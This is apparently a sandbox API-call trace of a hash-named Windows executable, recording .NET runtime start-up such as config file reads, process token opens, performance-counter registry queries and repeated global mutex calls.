[0205.182] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ec
[0205.184] GetLastError () returned 0x0
[0205.184] setsockopt (s=0x3ec, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0205.184] GetLastError () returned 0x273a
[0205.184] closesocket (s=0x3ec) returned 0
[0205.184] GetLastError () returned 0x0
[0205.424] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19e424, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0205.424] GetLastError () returned 0x0
[0205.424] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0205.424] GetLastError () returned 0x0
[0205.425] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19e3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0205.425] GetLastError () returned 0x0
[0205.766] GetCurrentProcess () returned 0xffffffff
[0205.766] GetLastError () returned 0x3f0
[0205.767] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e4ec | out: TokenHandle=0x19e4ec*=0x3fc) returned 1
[0205.767] GetLastError () returned 0x3f0
[0205.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x19e088, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
[0205.781] GetLastError () returned 0x0
[0205.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e530 | out: lpFileInformation=0x19e530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e31bc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xdd8a827a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xe8659c4d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0205.819] GetLastError () returned 0x0
[0205.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19e044, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0205.824] GetLastError () returned 0x0
[0205.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e528 | out: lpFileInformation=0x19e528*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e31bc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xdd8a827a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xe8659c4d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0205.825] GetLastError () returned 0x0
[0205.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0205.825] GetLastError () returned 0x0
[0205.825] SetErrorMode (uMode=0x1) returned 0x0
[0205.825] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x408
[0205.826] GetLastError () returned 0x0
[0205.826] GetFileType (hFile=0x408) returned 0x1
[0205.826] SetErrorMode (uMode=0x0) returned 0x1
[0205.826] GetFileType (hFile=0x408) returned 0x1
[0205.870] GetFileSize (in: hFile=0x408, lpFileSizeHigh=0x19e50c | out: lpFileSizeHigh=0x19e50c*=0x0) returned 0x65b3
[0205.870] GetLastError () returned 0x0
[0205.871] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19e4c4*=0x1000, lpOverlapped=0x0) returned 1
[0205.871] GetLastError () returned 0x0
[0206.313] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e0e0, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19e0e0*=0x1000, lpOverlapped=0x0) returned 1
[0206.314] GetLastError () returned 0x0
[0206.354] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19df24, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19df24*=0x1000, lpOverlapped=0x0) returned 1
[0206.354] GetLastError () returned 0x0
[0206.355] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19df24, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19df24*=0x1000, lpOverlapped=0x0) returned 1
[0206.355] GetLastError () returned 0x0
[0206.355] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19df24, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19df24*=0x1000, lpOverlapped=0x0) returned 1
[0206.355] GetLastError () returned 0x0
[0207.199] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e054, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19e054*=0x1000, lpOverlapped=0x0) returned 1
[0207.250] GetLastError () returned 0x0
[0207.251] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19de0c, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19de0c*=0x5b3, lpOverlapped=0x0) returned 1
[0207.251] GetLastError () returned 0x0
[0207.253] ReadFile (in: hFile=0x408, lpBuffer=0x2569968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19dfa8, lpOverlapped=0x0 | out: lpBuffer=0x2569968*, lpNumberOfBytesRead=0x19dfa8*=0x0, lpOverlapped=0x0) returned 1
[0207.253] GetLastError () returned 0x0
[0207.628] CloseHandle (hObject=0x408) returned 1
[0207.629] GetLastError () returned 0x0
[0207.645] GetCurrentProcess () returned 0xffffffff
[0207.645] GetLastError () returned 0x3f0
[0207.645] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e800 | out: TokenHandle=0x19e800*=0x408) returned 1
[0207.645] GetLastError () returned 0x3f0
[0207.652] GetCurrentProcess () returned 0xffffffff
[0207.652] GetLastError () returned 0x3f0
[0207.652] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e800 | out: TokenHandle=0x19e800*=0x404) returned 1
[0207.652] GetLastError () returned 0x3f0
[0207.657] GetCurrentProcess () returned 0xffffffff
[0207.657] GetLastError () returned 0x3f0
[0207.658] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e4ec | out: TokenHandle=0x19e4ec*=0x40c) returned 1
[0207.658] GetLastError () returned 0x3f0
[0207.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19e530 | out: lpFileInformation=0x19e530*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0207.693] GetLastError () returned 0x2
[0207.695] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19e044, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0207.695] GetLastError () returned 0x2
[0207.695] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19e528 | out: lpFileInformation=0x19e528*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0207.695] GetLastError () returned 0x2
[0207.696] GetCurrentProcess () returned 0xffffffff
[0207.696] GetLastError () returned 0x3f0
[0207.696] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e800 | out: TokenHandle=0x19e800*=0x410) returned 1
[0207.696] GetLastError () returned 0x3f0
[0207.704] GetCurrentProcess () returned 0xffffffff
[0207.704] GetLastError () returned 0x3f0
[0207.704] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e800 | out: TokenHandle=0x19e800*=0x414) returned 1
[0207.704] GetLastError () returned 0x3f0
[0207.785] GetCurrentProcess () returned 0xffffffff
[0207.785] GetLastError () returned 0x3f0
[0207.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e5e4 | out: TokenHandle=0x19e5e4*=0x418) returned 1
[0207.785] GetLastError () returned 0x3f0
[0208.013] GetCurrentProcess () returned 0xffffffff
[0208.014] GetLastError () returned 0x3f0
[0208.015] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e5f4 | out: TokenHandle=0x19e5f4*=0x41c) returned 1
[0208.020] GetLastError () returned 0x3f0
[0208.707] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19e3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0208.707] GetLastError () returned 0x3f0
[0208.710] GetCurrentProcessId () returned 0x9a8
[0208.714] GetComputerNameW (in: lpBuffer=0x673930, nSize=0x26910e0 | out: lpBuffer="XC64ZB", nSize=0x26910e0) returned 1
[0208.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e850 | out: phkResult=0x19e850*=0x420) returned 0x0
[0208.722] RegQueryValueExW (in: hKey=0x420, lpValueName="Library", lpReserved=0x0, lpType=0x19e88c, lpData=0x0, lpcbData=0x19e888*=0x0 | out: lpType=0x19e88c*=0x2, lpData=0x0, lpcbData=0x19e888*=0x48) returned 0x0
[0208.722] RegQueryValueExW (in: hKey=0x420, lpValueName="Library", lpReserved=0x0, lpType=0x19e88c, lpData=0x673930, lpcbData=0x19e888*=0x48 | out: lpType=0x19e88c*=0x2, lpData="%systemroot%\\system32\\netfxperf.dll", lpcbData=0x19e888*=0x48) returned 0x0
[0208.723] RegQueryValueExW (in: hKey=0x420, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x19e898, lpData=0x0, lpcbData=0x19e894*=0x0 | out: lpType=0x19e898*=0x4, lpData=0x0, lpcbData=0x19e894*=0x4) returned 0x0
[0208.724] RegQueryValueExW (in: hKey=0x420, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x19e898, lpData=0x19e884, lpcbData=0x19e894*=0x4 | out: lpType=0x19e898*=0x4, lpData=0x19e884*=0x1, lpcbData=0x19e894*=0x4) returned 0x0
[0208.724] RegQueryValueExW (in: hKey=0x420, lpValueName="First Counter", lpReserved=0x0, lpType=0x19e898, lpData=0x0, lpcbData=0x19e894*=0x0 | out: lpType=0x19e898*=0x4, lpData=0x0, lpcbData=0x19e894*=0x4) returned 0x0
[0208.724] RegQueryValueExW (in: hKey=0x420, lpValueName="First Counter", lpReserved=0x0, lpType=0x19e898, lpData=0x19e884, lpcbData=0x19e894*=0x4 | out: lpType=0x19e898*=0x4, lpData=0x19e884*=0x1770, lpcbData=0x19e894*=0x4) returned 0x0
[0208.724] RegCloseKey (hKey=0x420) returned 0x0
[0208.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e840 | out: phkResult=0x19e840*=0x420) returned 0x0
[0208.728] RegQueryValueExW (in: hKey=0x420, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x19e888, lpData=0x0, lpcbData=0x19e884*=0x0 | out: lpType=0x19e888*=0x4, lpData=0x0, lpcbData=0x19e884*=0x4) returned 0x0
[0208.728] RegQueryValueExW (in: hKey=0x420, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x19e888, lpData=0x19e874, lpcbData=0x19e884*=0x4 | out: lpType=0x19e888*=0x4, lpData=0x19e874*=0x3, lpcbData=0x19e884*=0x4) returned 0x0
[0208.728] RegQueryValueExW (in: hKey=0x420, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x19e888, lpData=0x0, lpcbData=0x19e884*=0x0 | out: lpType=0x19e888*=0x4, lpData=0x0, lpcbData=0x19e884*=0x4) returned 0x0
[0208.728] RegQueryValueExW (in: hKey=0x420, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x19e888, lpData=0x19e874, lpcbData=0x19e884*=0x4 | out: lpType=0x19e888*=0x4, lpData=0x19e874*=0x20000, lpcbData=0x19e884*=0x4) returned 0x0
[0208.729] RegQueryValueExW (in: hKey=0x420, lpValueName="Counter Names", lpReserved=0x0, lpType=0x19e888, lpData=0x0, lpcbData=0x19e884*=0x0 | out: lpType=0x19e888*=0x3, lpData=0x0, lpcbData=0x19e884*=0xaa) returned 0x0
[0208.729] RegQueryValueExW (in: hKey=0x420, lpValueName="Counter Names", lpReserved=0x0, lpType=0x19e888, lpData=0x26937f8, lpcbData=0x19e884*=0xaa | out: lpType=0x19e888*=0x3, lpData=0x26937f8*, lpcbData=0x19e884*=0xaa) returned 0x0
[0208.774] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(A;OICI;FRFWGRGW;;;AU)(A;OICI;FRFWGRGW;;;S-1-5-33)", StringSDRevision=0x1, SecurityDescriptor=0x19e7f4, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x19e7f4*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8004, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Sacl=0x0*(AclRevision=0x0, Sbz1=0x0, AclSize=0x0, AceCount=0x14, Sbz2=0x0), Dacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x30)), SecurityDescriptorSize=0x0) returned 1
[0208.778] GetLastError () returned 0x0
[0208.783] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x673960, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x424
[0208.792] GetLastError () returned 0x0
[0208.865] MapViewOfFile (hFileMappingObject=0x424, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5cd0000
[0208.868] VirtualQuery (in: lpAddress=0x5cd0000, lpBuffer=0x19e858, dwLength=0x1c | out: lpBuffer=0x19e858*(BaseAddress=0x5cd0000, AllocationBase=0x5cd0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
[0208.868] GetLastError () returned 0x0
[0208.869] LocalFree (hMem=0x66bb88) returned 0x0
[0208.869] RegCloseKey (hKey=0x420) returned 0x0
[0208.871] GetVersionExW (in: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0208.872] GetLastError () returned 0x0
[0208.876] GetVersionExW (in: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0208.876] GetLastError () returned 0x0
[0208.877] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x251049c, cbSid=0x19e838 | out: pSid=0x251049c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.877] GetLastError () returned 0x0
[0208.902] CreateMutexW (lpMutexAttributes=0x25105d4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.902] GetLastError () returned 0x0
[0208.904] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.904] GetLastError () returned 0x0
[0208.904] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x25107a8, cbSid=0x19e7f8 | out: pSid=0x25107a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e7f8) returned 1
[0208.904] GetLastError () returned 0x0
[0208.905] CreateMutexW (lpMutexAttributes=0x25108b8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
[0208.905] GetLastError () returned 0x5
[0208.906] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
[0208.906] GetLastError () returned 0x5
[0208.906] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
[0208.907] GetLastError () returned 0x5
[0208.907] ReleaseMutex (hMutex=0x40c) returned 1
[0208.907] GetLastError () returned 0x5
[0208.907] CloseHandle (hObject=0x40c) returned 1
[0208.907] GetLastError () returned 0x5
[0208.907] GetCurrentProcessId () returned 0x9a8
[0208.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a8) returned 0x40c
[0208.909] GetLastError () returned 0x5
[0208.910] GetProcessTimes (in: hProcess=0x40c, lpCreationTime=0x19e7fc, lpExitTime=0x19e7f4, lpKernelTime=0x19e7f4, lpUserTime=0x19e7f4 | out: lpCreationTime=0x19e7fc, lpExitTime=0x19e7f4, lpKernelTime=0x19e7f4, lpUserTime=0x19e7f4) returned 1
[0208.910] GetLastError () returned 0x5
[0208.911] CloseHandle (hObject=0x40c) returned 1
[0208.911] GetLastError () returned 0x5
[0208.911] ReleaseMutex (hMutex=0x420) returned 1
[0208.912] GetLastError () returned 0x5
[0208.912] CloseHandle (hObject=0x420) returned 1
[0208.912] GetLastError () returned 0x5
[0208.912] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x25110c8, cbSid=0x19e838 | out: pSid=0x25110c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.912] GetLastError () returned 0x5
[0208.913] CreateMutexW (lpMutexAttributes=0x25111d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.979] GetLastError () returned 0x0
[0208.980] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.980] GetLastError () returned 0x0
[0208.981] ReleaseMutex (hMutex=0x420) returned 1
[0208.981] GetLastError () returned 0x0
[0208.981] CloseHandle (hObject=0x420) returned 1
[0208.981] GetLastError () returned 0x0
[0208.982] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255c3c4, cbSid=0x19e838 | out: pSid=0x255c3c4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.982] GetLastError () returned 0x0
[0208.982] CreateMutexW (lpMutexAttributes=0x255c4d4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.983] GetLastError () returned 0x0
[0208.983] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.983] GetLastError () returned 0x0
[0208.983] ReleaseMutex (hMutex=0x420) returned 1
[0208.983] GetLastError () returned 0x0
[0208.983] CloseHandle (hObject=0x420) returned 1
[0208.984] GetLastError () returned 0x0
[0208.984] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255cb60, cbSid=0x19e838 | out: pSid=0x255cb60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.984] GetLastError () returned 0x0
[0208.985] CreateMutexW (lpMutexAttributes=0x255cc70, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.985] GetLastError () returned 0x0
[0208.985] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.985] GetLastError () returned 0x0
[0208.986] ReleaseMutex (hMutex=0x420) returned 1
[0208.986] GetLastError () returned 0x0
[0208.986] CloseHandle (hObject=0x420) returned 1
[0208.986] GetLastError () returned 0x0
[0208.986] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255d2f4, cbSid=0x19e838 | out: pSid=0x255d2f4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e838) returned 1
[0208.989] GetLastError () returned 0x0
[0208.990] CreateMutexW (lpMutexAttributes=0x255d404, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0208.990] GetLastError () returned 0x0
[0208.990] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0208.990] GetLastError () returned 0x0
[0208.993] ReleaseMutex (hMutex=0x420) returned 1
[0208.993] GetLastError () returned 0x0
[0208.993] CloseHandle (hObject=0x420) returned 1
[0208.993] GetLastError () returned 0x0
[0208.994] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255da80, cbSid=0x19e830 | out: pSid=0x255da80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0208.994] GetLastError () returned 0x0
[0209.000] CreateMutexW (lpMutexAttributes=0x255db90, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.000] GetLastError () returned 0x0
[0209.001] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.001] GetLastError () returned 0x0
[0209.001] ReleaseMutex (hMutex=0x420) returned 1
[0209.001] GetLastError () returned 0x0
[0209.002] CloseHandle (hObject=0x420) returned 1
[0209.002] GetLastError () returned 0x0
[0209.002] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255e218, cbSid=0x19e830 | out: pSid=0x255e218*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0209.002] GetLastError () returned 0x0
[0209.003] CreateMutexW (lpMutexAttributes=0x255e328, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.003] GetLastError () returned 0x0
[0209.003] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.003] GetLastError () returned 0x0
[0209.003] ReleaseMutex (hMutex=0x420) returned 1
[0209.004] GetLastError () returned 0x0
[0209.004] CloseHandle (hObject=0x420) returned 1
[0209.004] GetLastError () returned 0x0
[0209.004] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255e98c, cbSid=0x19e830 | out: pSid=0x255e98c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0209.004] GetLastError () returned 0x0
[0209.005] CreateMutexW (lpMutexAttributes=0x255ea9c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.005] GetLastError () returned 0x0
[0209.005] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.005] GetLastError () returned 0x0
[0209.006] ReleaseMutex (hMutex=0x420) returned 1
[0209.006] GetLastError () returned 0x0
[0209.006] CloseHandle (hObject=0x420) returned 1
[0209.006] GetLastError () returned 0x0
[0209.006] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255f110, cbSid=0x19e830 | out: pSid=0x255f110*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0209.007] GetLastError () returned 0x0
[0209.007] CreateMutexW (lpMutexAttributes=0x255f220, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.007] GetLastError () returned 0x0
[0209.008] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.008] GetLastError () returned 0x0
